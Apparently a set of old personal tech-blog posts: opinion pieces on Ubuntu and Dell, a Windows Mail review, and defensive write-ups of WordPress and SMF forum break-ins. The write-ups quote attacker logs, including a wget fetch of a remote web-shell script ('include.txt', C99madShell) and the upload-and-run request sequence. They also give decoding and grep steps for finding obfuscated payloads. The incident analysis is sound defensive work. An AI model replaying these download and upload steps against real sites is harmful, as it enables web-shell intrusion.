Ubuntu Concedes Defeat, Canonical Throws in The Towel

While it’s not quite as dramatic as the title might suggest…

It is true. As it was a year ago, and still is today.

The success of Ubuntu Linux and Canonical is only one part truth… If success = being popular.

If you take your news from digg.com, cnet, or any other tech friendly site on the net, you will read one thing over and over again, every day of the year: Ubuntu is taking over the world, Vista does not work, and Microsoft is dying.

The facts are that 1) Ubuntu Linux is another popular linux distribution (at the head of a long line of distros that have seen their peaks), 2) Vista is the best OS so far, works well, and is a major seller, and 3) Microsoft revenues have been trending upward for as long as I can remember.

Consider also the facts that digg.com (net’s biggest anti-MS site) makes all its money from a Microsoft partnership [after Google dropped them], and that Ubuntu Linux is purely a product of Corporate sponsorship and development … and what do you have left?

It’s not “reality” because reality is not something that the pressure groups of self agendas can handle, and neither is the truth.

The truth is that 1) some people feel the need to be part of a group that needs to constantly reassure one another that “their way is the best way” and 2) tech sites need to drive traffic to generate ad revenues by spreading fear, uncertainty, and distrust.

Just today I was reading on a tech site how Canonical’s revenues are in the stratosphere. Right! Lets see…

This is the same day Shuttleworth goes on to claim that Canonical is not cash positive (they are spending more than they are taking in) and it will take another 5 years of funding [Source]… At only a 10 million a year burn rate.

In other news, there is no money to be made on desktop linux, but that’s okay, because everyone already new that. Hindsight is always 20/20.

Windows Mail for Vista, Not As Bad As I Thought.

Having used Windows XP for the last several years, I’ve recently decided to migrate to Windows Vista after purchasing a Dell 530 quad core PC with a 24 inch LCD.

My choices were to:
1. Keep using Thunderbird
2. Migrate to Outlook [Office]
3. Or try the native Windows Vista Mail application [“Windows Mail” is the replacement for Outlook Express].

The choice of using Thunderbird was the simplest of them all… But I wanted to try something new. The stability issues and a non-modern UI were the other decisive factors at play.

In the end, Windows Mail was the winner. But not an easy one.

Here is what I have discovered, which should have been documented somewhere but is not.

a) There is no way to import mbox format mail from other Mail Clients.

I used a temporary IMAP folder to copy/move messages from one mail client to the other; to bypass the obvious underlining format issues.

b) All POP accounts go into the main Local Inbox folder.

If you want to structurally segment different POP accounts, you will need to create Local sub-folders and create message rules that are conditional on the specific account. I can make a case for or against this [if this is a feature or a limit].

c) Message Rules do not apply to IMAP folders.

And there are no setting to automatically copy/move messages from select IMAP folders or accounts to the Local Folders. Again, I can make a case for or against this [both ways].

d) The Spam filter does not automatically apply to IMAP accounts and folders even when “Synchronization Settings” are set to “All messages” [which downloads the entire message body].

You actually have to open the message for the spam filter to process it. Though I think it might act on the header data it receives, proactively, or perhaps even on the message body when you select “Work Offline”.

All in all, after using Windows Mail I’ve actually become fond of it. It’s a great app and integrates well with the system.

Gmail IMAP folders use a “/” path in their structure. Example: The All Mail folder is “[Gmail]/All Mail”. Windows Mail does not allow you to use this character to specify the special IMAP folders. It still works, but looks a little odd. There are ways to get around this if it bothers you.

Another Day, Another WordPress Hack.

It could have been worse.

A few weeks ago we were hit with an SMF v1.1.3 exploit just a few days after the release of v1.1.4. The intruder inserted a slew of hidden spam links into the main ‘index.php’ file.

It took me a day or two to detect the modifications. And in this short time period forums.devside.net, which has been online since 2003, with a healthy Pagerank, had all it’s pages dropped from Google [with the exception of profiles and archives].

It’s a good thing I keep the forums on their own sub-domain, which Google treats more like a separate domain than anything else. A SE problem with the sub does not affect the main domain.

As a counter-measure to these “exploit app weakness, get shell, d/l script, profit” type of attacks, I have disabled most of the shell related PHP functions on the server.

And so I thought my problems where solved…

This time it’s my fault. I was running WordPress v2.2.2, with v2.2.3 having been released about a month ago. I’ve been checking the WP dashboard, but I must have missed it, or forgotten about it.

This time the intruder exploited one of many WP weaknesses, and inserted some type of a hidden “-1″ post that was nothing more than an attachment to this particular shell-script, executed with URL ‘/blog/?poncheg’…

WordPress Hack 1

WordPress Hack 2 - - [08/Oct/2007:07:10:20 -0400] "GET /wp-includes/js/tinymce/wp-mce-help.php HTTP/1.0" 404 520 "-" "-" - - [08/Oct/2007:07:10:25 -0400] "GET / HTTP/1.0" 200 12071 "-" "-" - - [08/Oct/2007:07:10:35 -0400] "GET /blog/wp-includes/js/tinymce/wp-mce-help.php HTTP/1.0" 200 7665 "-" "-" - - [08/Oct/2007:07:11:01 -0400] "POST /blog/xmlrpc.php HTTP/1.0" 200 4327 "-" "Opera" - - [08/Oct/2007:07:11:49 -0400] "POST /blog/wp-admin/options.php HTTP/1.0" 200 1647 "http://www.devside.net/blog/wp-admin/options.php" "Opera" - - [08/Oct/2007:07:11:56 -0400] "POST /blog/wp-admin/options.php HTTP/1.0" 302 904 "http://www.devside.net/blog/wp-admin/options.php" "Opera" - - [08/Oct/2007:07:11:59 -0400] "POST /blog/wp-admin/upload.php?style=inline&tab=upload&post_id=-1 HTTP/1.0" 200 1554 "http://www.devside.net/
blog/upload.php?style=inline&tab=upload&post_id=-1" "Opera" - - [08/Oct/2007:07:12:14 -0400] "POST /blog/wp-admin/upload.php?style=inline&tab=upload&post_id=-1 HTTP/1.0" 302 509 "http://www.devside.net/b
log/upload.php?style=inline&tab=upload&post_id=-1" "Opera" - - [08/Oct/2007:07:12:25 -0400] "POST /blog/wp-admin/options.php HTTP/1.0" 200 1629 "http://www.devside.net/blog/wp-admin/options.php" "Opera" - - [08/Oct/2007:07:12:30 -0400] "POST /blog/wp-admin/options.php HTTP/1.0" 302 904 "http://www.devside.net/blog/wp-admin/options.php" "Opera" - - [08/Oct/2007:07:12:33 -0400] "GET /blog/wp-admin/upgrade.php?step=1 HTTP/1.0" 200 1446 "-" "-"
... - - [08/Oct/2007:07:12:48 -0400] "GET /blog/?poncheg HTTP/1.0" 200 4789 "-" "Opera/9.22 (Windows NT 5.1; U; ru)"
JSC "VimpelCom" WLAN1 Moscow

Host name of is vps206.fastvps.ru

Luckily, in addition to the disabled PHP functions, I also had all my file/dir permissions under WP locked down, so it does not look like anything was modified. I still recreated the entire WP directory, just for safety sakes, and had to manually go into the database and delete the hidden attachment/post.

It’s not a matter of if you are going to get hacked, it’s a matter of when. So keep those web apps patched!

All Your SMF Forums Have Been Hacked. Have a Nice Day.

There is nothing quite like innocently checking over your httpd logs, attempting to figure out why the ‘preview’ feature of your forum s/w has stopped working [stuck on ‘fetching preview…’], only to come up to this…

--09:57:23--  http://kotzilla.jino-net.ru/include.txt
           => `include.txt'
Resolving kotzilla.jino-net.ru...
Connecting to kotzilla.jino-net.ru||:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 44,348 (43K) [text/plain]

    0K .......... .......... .......... .......... ...       100%   69.60 KB/s

09:57:25 (69.60 KB/s) - `include.txt' saved [44348/44348]

For those that do not know, the above translates to using wget, or the equivalent, to download a script to your system. With all this being done via Apache and usually from a simple URL designed to exploit a weakness in the given application.

My journey starts here.

Step 1.

find / -name include.txt

Nothing. Intruder must have deleted or renamed it.

Step 2.
Check http://kotzilla.jino-net.ru/include.txt for clues.

$login = ""; //Login
$pass = "";  //Pass
$md5_pass = ""; //If no pass then hash

Intruder must think this is clever. Once you decode and inflate the string, it returns…

eval(gzinflate(base64_decode('[another string to decode and inflate]')));

Step 3.
We do not want to execute any PHP code that is an unknown. The only option left is to write a PHP script to decode/inflate until we get at the center…

$string = "eval(gzinflate(base64_decode('HJ3HkqN...[removed]...f/79z/8A')));";
$pattern = '/^eval(gzinflate(base64_decode('([^');]*)/';
$count = 0;
while (preg_match($pattern, $string, $matches) )
$string = gzinflate(base64_decode($matches[1]));
echo "Decoded/Inflated:$countn";
echo "$string";

Seems to be some type of a web php shell script called C99madShell.

Step 4.
We need to locate the downloaded script…

find / -name '*.php' | xargs grep 'eval(gzinflate(base64_decode('

Not good!

Hack Shell 1

Hack Shell 2

Step 5.
Check logs.

grep 'readme.php' /.../forums.devside.net/access_log

Intruder was up to something no good. - - [26/Sep/2007:09:57:38 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4374 "-" "Opera/9.21 (Windows NT 5.1; U; ru)" - - [26/Sep/2007:09:58:00 -0400] "POST /Themes/readme.php HTTP/1.1" 200 3501 "http://forums.devside.net/Themes/readme.php" "Opera/9.21 (Windows NT 5.1; U; ru)" - - [27/Sep/2007:13:08:03 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4366 "-" "GoogleBotv2" - - [27/Sep/2007:13:09:24 -0400] "POST /Themes/readme.php HTTP/1.1" 200 4980 "http://forums.devside.net/Themes/readme.php" "GoogleBotv2"

Final Analysis.
I’ve search the logs, and I cannot locate anything helpful about the exploit. It does not seem to be an exploit in a URL, maybe POST related, or has something to do with the SMF theme function. I run no mods, and use the default theme, and do not allow users to switch themes.

The latest SMF 1.1.4 changelog does not state anything about fixed exploits.

I know the IP of the intruder [I’m sure just a hijacked system], the user_id on the forum, the mail account used for activation, but not much anything else.

Host name of is nzs.agh.edu.pl - - [26/Sep/2007:09:52:58 -0400] "GET /index.php?action=activate;u=1992;code=136bd7eb0f HTTP/1.1" 200 3409 "http://www.qcsalabama.com/mail/src/
read_body.php?mailbox=INBOX&passed_id=685&startMessage=1" "Opera/9.21 (Windows NT 5.1; U; ru)"

Checking the forum account, I see this user has also logged in via another IP [and this might be where the exploit starts]… - - [26/Sep/2007:09:48:07 -0400] "GET /index.php?action=register HTTP/1.1" 200 5961 "http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all&
q=+%22powered+by+smf+1.1.3%22+site%3Anet&btnG=Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv: Gecko/20070914 Firefox/"
... - - [26/Sep/2007:09:57:07 -0400] "POST //index.php?action=login2 HTTP/1.1" 302 851 "-" "Mozilla/4.0 (compatible; Windows 5.1)" - - [26/Sep/2007:09:57:09 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 375 "-" "Mozilla/4.0 (compatible; Windows 5.1)" - - [26/Sep/2007:09:57:11 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 1527 "-" "Mozilla/4.0 (compatible; Windows 5.1)" - - [26/Sep/2007:09:57:23 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 307 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
Host name of is ppp135-75.tis-dialog.ru

I can understand phpBB getting rooted, I can understand WordPress being owned, but this is a first one for SMF.

And for anyone having odd issues with SMF [like getting stuck on ‘fetching preview…’]…

Smile. All your SMF forums have been hacked. Have a nice day.

Search ‘fetching preview’ on the SMF support forums. This hack/exploit might be going back years.

Ubuntu and Dell, a Mismatch Made in a Place Called Hell [IdeaStorm].

I’m going to keep this one short and simple, and to the point.

And I’m not even going to write anything.

Why the Dell/Ubuntu Deal Won’t Improve Linux’s Market Share

When you take a few steps back from the furor and zealotry and take a close look at whats happened here, you will quickly start to see the cracks. One problem is that Dell appears to be under the misguided impression that listening to the IdeaStorm community is the same as listening to customers. It’s not. Anyone can register and become an instant member of the IdeaStorm community. What Dell listened to wasn’t a cross-section of customers, but rather a pressure group.

There are a series of other pressure groups in operation on IdeaStorm right now, people who are putting their own agendas on the table and expecting Dell to carry them out

A wise and sound analysis that iterates everything mentioned here on the topic.